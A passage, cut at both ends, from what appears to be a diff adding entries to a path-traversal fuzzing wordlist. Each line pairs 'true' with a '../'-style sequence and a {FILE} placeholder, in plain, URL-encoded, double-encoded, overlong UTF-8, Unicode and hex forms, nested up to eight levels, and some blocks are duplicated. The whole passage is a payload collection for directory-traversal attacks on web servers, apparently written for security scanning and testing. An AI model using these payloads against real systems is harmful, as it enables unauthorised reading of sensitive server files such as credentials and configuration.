"true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,\\../{FILE}", + "true,\\../\\../{FILE}", + "true,\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,/..\\{FILE}", + "true,/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,.../{FILE}", + "true,.../.../{FILE}", + "true,.../.../.../{FILE}", + "true,.../.../.../.../{FILE}", + "true,.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../.../{FILE}", + "true,...\\{FILE}", + "true,...\\...\\{FILE}", + "true,...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,..../{FILE}", + "true,..../..../{FILE}", + "true,..../..../..../{FILE}", + "true,..../..../..../..../{FILE}", + "true,..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../..../{FILE}", + "true,....\\{FILE}", + "true,....\\....\\{FILE}", + "true,....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,........................................................................../{FILE}", + "true,........................................................................../../{FILE}", + "true,........................................................................../../../{FILE}", + "true,........................................................................../../../../{FILE}", + "true,........................................................................../../../../../{FILE}", + "true,........................................................................../../../../../../{FILE}", + "true,........................................................................../../../../../../../{FILE}", + "true,........................................................................../../../../../../../../{FILE}", + "true,..........................................................................\\{FILE}", + "true,..........................................................................\\..\\{FILE}", + "true,..........................................................................\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%u2215{FILE}", + "true,..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,..%u2216{FILE}", + "true,..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uF025{FILE}", + "true,..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,..0x2f{FILE}", + "true,..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,..0x5c{FILE}", + "true,..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c{FILE}", + 